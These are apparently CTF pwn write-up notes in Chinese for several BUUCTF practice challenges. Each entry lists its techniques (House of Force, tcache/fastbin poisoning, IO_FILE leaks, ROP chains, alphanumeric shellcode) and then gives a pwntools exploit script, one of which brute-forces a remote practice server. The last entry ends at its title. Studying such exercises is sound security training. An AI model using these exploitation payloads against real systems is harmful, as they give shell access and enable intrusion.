wdb2018_guess (较易)考点:
fork子进程
stack smashing
利用environ确定任意栈地址
python
def exp (): ru("Please type your guessing flag" ) sl('a' * 0x128 + p64(elf.got['puts' ])) libc_base = uu64(ru("\x7f" )[-6 :]) - libc.sym['puts' ] environ = libc_base + libc.sym["__environ" ] sla('Please type your guessing flag' , 'a' * 0x128 + p64(environ)) flag = uu64(ru("\x7f" )[-6 :]) - 0x168 sla("Please type your guessing flag" , 'a' * 0x128 + p64(flag)) pass
gyctf_2020_force (较难)考点:
mmap泄露堆地址
House of Force
realloc_hook调整栈帧使og生效
卡在了泄露地址这个点,学到了mmap出来的空间相邻libc的地址
house of force改top chunk的地址为-1(0xfff…)
然后无限申请,算下malloc_hook的偏移到topchunk,然后申请到附近改那两个hook
python
def exp (): libc_base = add(0x200000 , 'mmap' ) + 0x201000 - 0x10 echo("base:" + hex (libc_base)) one_addr = add(0x10 , 'a' * 0x10 + p64(0 ) + p64(0xffffffffffffffff )) - 0x10 size = (libc_base + libc.sym["__malloc_hook" ]) - (one_addr + 0x20 ) - 0x40 echo(hex (size)) add(size, 'a' ) og = [0x45216 , 0x4526a , 0xf02a4 , 0xf1147 ] binsh = add(0x40 , '\x00' * 0x18 + p64(libc_base + og[1 ]) + p64(libc_base + libc.sym["__libc_realloc" ] + 0x10 )) gdba() sla(menu, str (_add)) sla("size" , str (0xdead )) pass
picoctf_2018_buffer overflow 0 (较易)考点:
ssh连接到服务器,运行函数通过命令行传入参数然后泄露出flag
gyctf_2020_some_thing_interesting (中等)考点:
python
def exp (): sa("> Input your code please:" , "OreOOrereOOreO" ) add(0x30 , p64(0 ) + p64(0x41 ),0x30 , p64(0 ) + p64(0x41 )) add(0x30 , 'aaaa' , 0x30 , 'bbbb' ) free(2 ) show(2 ) ru("RE is " ) heap = uu64(io.recvuntil("\n" , drop=True )[-6 :]) - 0x80 echo("heap:" + hex (heap)) edit(2 , '\x00' , p64(heap + 0x10 )) payload = p64(0 ) * 4 + p64(0 ) + p64(0x91 ) add(0x30 , p64(0 ) + p64(0x31 ), 0x30 , payload) free(1 ) show(1 ) libc_base = uu64(ru("\x7f" )[-6 :]) - 88 - 0x10 - libc.sym["__malloc_hook" ] echo("libc base:" + hex (libc_base)) libc.address = libc_base add(0x60 , 'a' , 0x60 , 'a' ) add(0x60 , 'a' , 0x60 , 'b' ) free(4 ) edit(4 , p64(0 ), p64(libc.sym["__malloc_hook" ] - 0x23 )) og = [0x45216 , 0x4526a , 0xf02a4 , 0xf1147 ] payload = 0x13 * '\x00' + p64(libc.address + og[3 ]) add(0x60 , 'a' , 0x60 , payload) gdba() pass
mrctf2020_shellcode_revenge (难)考点:
震撼我一整年
python
def exp (): sa("Show me your magic!" , "Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t" ) pass
X86:https://introspelliam.github.io/2017/09/30/pwn/%E5%85%A8%E6%98%AF%E5%8F%AF%E8%A7%81%E5%AD%97%E7%AC%A6%E7%9A%84shellcode/
roarctf_2019_realloc_magic (难)考点:
realloc函数的特性
堆布局
2.27下的IO泄露地址
总结:没有edit可以通过连续的free函数做uaf;由于不检查size,在只有heapptr的时候可以realloc(0)后构造overlap,覆盖victim的size,这样的效果可以使得逐个清空某个size大小的tcache bin,最终申请到freehook;泄露io直接申请到stdout的地方改writebase为0x58泄露IO-file-jumps的地址;爆破注意模板
python
def exp (): dbg() add(0x60 , 'a' ) add(0 , '\x00' ) add(0xa0 , 'a' ) add(0 , '\x00' ) add(0x10 , 'b' ) add(0 , '\x00' ) add(0xa0 , 'a' ) for i in range (7 ): free() add(0 , '' ) add(0x60 , '\x00' ) payload = 0x60 * 'a' + p64(0 ) + p64(0x41 ) + p8(0x60 ) + p8(0x97 ) add(0x110 , payload) add(0 , '' ) add(0xa0 , '\x00' ) add(0 , '' ) add(0xa0 , p64(0xfbad1887 ) + p64(0 ) * 3 + p8(0x58 )) leak = u64(io.recvuntil("\x7f" ,timeout=0.1 )[-6 :].ljust(8 , '\x00' )) - libc.sym["_IO_file_jumps" ] echo("leak:" + hex (leak)) if leak == -libc.sym["_IO_file_jumps" ]: exit(-1 ) backdoor() __free_hook = leak + libc.sym["__free_hook" ] add(0x30 , 'a' ) free() add(0 , '' ) add(0x110 , 'a' * 0x68 + p64(0x51 ) + p64(__free_hook - 8 )) add(0 , '' ) add(0x30 , p8((__free_hook - 8 ) & 0xff )) add(0 , '' ) add(0x30 , '/bin/sh\x00' + p64(leak + libc.sym["system" ])) gdba() ia() if __name__ == '__main__' : while True : io = remote("node4.buuoj.cn" , 29747 ) try : exp() except : io.close() continue
强网杯2019 拟态 STKOF (较易)考点
ROPgadget生成的ropchain长度超了,ropper可以
python
def exp (): p = lambda x : pack('Q' , x) IMAGE_BASE_0 = 0x0000000000400000 rebase_0 = lambda x : p(x + IMAGE_BASE_0) rop = '' rop += rebase_0(0x0000000000001d0d ) rop += '//bin/sh' rop += rebase_0(0x00000000000005f6 ) rop += rebase_0(0x00000000002a10e0 ) rop += rebase_0(0x0000000000055ec9 ) rop += p(0xdeadbeefdeadbeef ) rop += p(0xdeadbeefdeadbeef ) rop += p(0xdeadbeefdeadbeef ) rop += p(0xdeadbeefdeadbeef ) rop += rebase_0(0x0000000000001d0d ) rop += p(0x0000000000000000 ) rop += rebase_0(0x00000000000005f6 ) rop += rebase_0(0x00000000002a10e8 ) rop += rebase_0(0x0000000000055ec9 ) rop += p(0xdeadbeefdeadbeef ) rop += p(0xdeadbeefdeadbeef ) rop += p(0xdeadbeefdeadbeef ) rop += p(0xdeadbeefdeadbeef ) rop += rebase_0(0x00000000000005f6 ) rop += rebase_0(0x00000000002a10e0 ) rop += rebase_0(0x0000000000005895 ) rop += rebase_0(0x00000000002a10e8 ) rop += rebase_0(0x000000000003d9d5 ) rop += rebase_0(0x00000000002a10e8 ) rop += rebase_0(0x000000000003b97c ) rop += p(0x000000000000003b ) rop += rebase_0(0x0000000000061645 ) print rop payload = 'a' * 0x118 payload += rop echo(hex (len (payload))) ru("We give you a little challenge, try to pwn it?" ) sd(payload) pass
ciscn_2019_final_5 